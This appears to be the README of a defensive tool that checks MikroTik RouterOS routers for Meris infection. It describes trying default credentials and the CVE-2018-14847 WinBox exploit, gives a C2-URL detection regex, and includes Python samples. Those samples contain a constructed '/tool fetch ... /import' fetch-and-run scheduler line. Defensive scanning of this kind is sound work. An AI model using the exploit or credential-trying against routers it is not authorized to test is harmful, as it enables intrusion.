Overview

Meris RouterOS Checker

This tool checks a list of IP addresses of RouterOS-based routers to validate whether they were infected with Meris.

The tool will:

  • Attempt to connect using the credentials in credentials.txt (one username:password pair per line; a default file is provided)
  • Attempt to exploit the router using CVE-2018-14847 (the WinBox credential-disclosure bug in RouterOS versions up to 6.42)

The tool supports:

  • RouterOS API
  • SSH
  • WinBox (tested for <= 6.42)

The tool uses:

The tool writes an exploited.csv file with a table of results for each provided IP address.

Note: To build the modified version of bytheway, use the provided .cpp files in place of the original main.cpp when building. Name the resulting binaries btw and btw_stage2 respectively and place them next to the tool.

Detection rules

The tool lists the router's scheduler scripts and checks whether any of them contains an IoC listed in indicators.txt. It also matches the script contents against the regex https?://[^/]+/poll/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12} (a Meris-style C2 polling URL with a UUID path component) and flags any match as a possible infection.
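The detection logic above, as an added example (this is not the project's own code). It assumes the scheduler scripts have already been collected into a name-to-script dictionary (the tool obtains them over API, SSH or WinBox) and that indicators.txt holds one IoC per line; the sample indicators and scheduler entries below are constructed for illustration and are not real Meris indicators.

```python
import re
from typing import Dict, List, Tuple

# The regex quoted in the README: a Meris C2 polling URL with a UUID path component.
MERIS_POLL_URL = re.compile(
    r"https?://[^/]+/poll/"
    r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
)


def load_indicators(text: str) -> List[str]:
    """Parse indicators.txt-style content: one IoC per line.
    Assumed format: blank lines and '#' comments are ignored (the README only says
    the file lists IoCs)."""
    indicators = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            indicators.append(line)
    return indicators


def check_script(name: str, body: str, indicators: List[str]) -> List[Tuple[str, str, str]]:
    """Return one (scheduler_name, reason, match) tuple per hit in a single scheduler script.
    reason is 'ioc' for a substring match against indicators.txt and 'poll-url' for the regex."""
    hits = []
    lowered = body.lower()
    for ioc in indicators:
        # Case-insensitive substring match; hostnames and IPs are the typical IoC type here.
        if ioc.lower() in lowered:
            hits.append((name, "ioc", ioc))
    for m in MERIS_POLL_URL.finditer(body):
        hits.append((name, "poll-url", m.group(0)))
    return hits


def check_scheduler(scripts: Dict[str, str], indicators: List[str]) -> List[Tuple[str, str, str]]:
    """Run check_script over every scheduler entry on one router."""
    findings = []
    for name, body in scripts.items():
        findings.extend(check_script(name, body, indicators))
    return findings


def verdict(findings: List[Tuple[str, str, str]]) -> str:
    """Collapse the findings into the per-router verdict the CSV would carry."""
    return "possible infection" if findings else "clean"


# Constructed sample indicators.txt content (not real Meris IoCs).
SAMPLE_INDICATORS = """
# constructed example indicators, one per line
bad-c2.example.invalid
10.0.0.99
"""

# Constructed scheduler scripts: one benign backup job and two hypothetical malicious jobs.
SAMPLE_SCRIPTS = {
    "backup": "/system backup save name=nightly",
    "u113": '/tool fetch url="http://203.0.113.5/poll/0f9c2b3a-1111-4444-8888-0123456789ab" '
            'mode=http dst-path=p; /import p',
    "upd": '/tool fetch url="https://bad-c2.example.invalid/x" dst-path=x',
}

if __name__ == "__main__":
    inds = load_indicators(SAMPLE_INDICATORS)
    results = check_scheduler(SAMPLE_SCRIPTS, inds)
    for row in results:
        print(row)
    print(verdict(results))
```

Both checks are reported separately so an analyst can tell an IoC hit (which depends on how current indicators.txt is) from a structural regex hit, which still fires on a C2 host that no one has listed yet.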

Tool usage

The tool requires either an --ip or --ipfile option.

--ip takes a single IP address as input; --ipfile takes a file with a list of IP addresses, one IP per line.

Optionally, --threads sets the number of worker threads (default 16).

Issues
  • Fixed cred loader split to only delimiter first :

    I ran into an issue with a randomly generated password for the MikroTik admin that caused the PoC to not be able to authenticate. Turned out that the password had a colon in it and line 38 was splitting it into 3 parts instead of 'username','password'.

    Changed split maxsplit to 1 so any occurrences of a colon in the actual password will be ignored. Tested to work both with and without a colon in the password now.

    opened by TalonM 0
  • Meris Check For Dummies™

    Hi thanks for creating this! 👍

    Could you include some instructions for people that might understand that req.txt has some importance, but not exactly know what to do without googling it?

    Thanks!

    opened by briantopping 10
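The credential loader fix described in the first issue above, as an added example (not the project's own code): the original behaviour split on every colon, so a password containing ':' produced three fields; splitting with maxsplit=1 keeps everything after the first colon as the password. The sample credentials.txt content is constructed and is not the default file shipped with the tool; the blank-line handling is an assumption.

```python
from typing import List, Tuple


def split_buggy(line: str) -> List[str]:
    """The behaviour the issue describes: every ':' is a delimiter,
    so 'admin:p@ss:w0rd' becomes three fields and unpacking into two fails."""
    return line.rstrip("\r\n").split(":")


def parse_credential_line(line: str) -> Tuple[str, str]:
    """Split a 'username:password' line on the first ':' only.
    The username cannot contain ':' (it is the delimiter); the password may.
    Only the line terminator is stripped so passwords with leading or trailing
    spaces survive intact."""
    line = line.rstrip("\r\n")
    if ":" not in line:
        raise ValueError(f"expected username:password, got {line!r}")
    user, password = line.split(":", 1)
    return user, password


def load_credentials(text: str) -> List[Tuple[str, str]]:
    """Load one credential pair per line. Assumption: blank lines are skipped
    and there is no comment syntax (the README only says one pair per line)."""
    creds = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        creds.append(parse_credential_line(raw))
    return creds


# Constructed sample credentials.txt content: a RouterOS-style empty admin
# password and a randomly generated password that happens to contain a colon.
SAMPLE_CREDENTIALS = "admin:\nadmin:p@ss:w0rd\n"

if __name__ == "__main__":
    print(split_buggy("admin:p@ss:w0rd"))
    for user, password in load_credentials(SAMPLE_CREDENTIALS):
        print(repr(user), repr(password))
```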
Owner
Eclypsium